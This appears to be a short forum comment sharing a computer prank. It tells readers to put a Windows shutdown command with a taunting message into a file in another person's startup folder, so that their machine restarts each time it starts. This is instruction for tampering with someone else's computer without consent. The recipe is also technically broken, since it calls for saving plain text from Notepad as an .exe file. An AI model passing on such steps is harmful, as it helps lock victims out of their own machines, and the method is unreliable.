    Best part? The only thing that exits out of it is Esc.

    Better one? Open a new notepad document, copy this in, and save it as shutdown.exe. Then copy it into their startup folder. It auto restarts the machine everytime they start it.

    C:\Windows\System32\shutdown.exe -r -t 10 -c "Your computer will now restart. Sucks to be you, huh?"
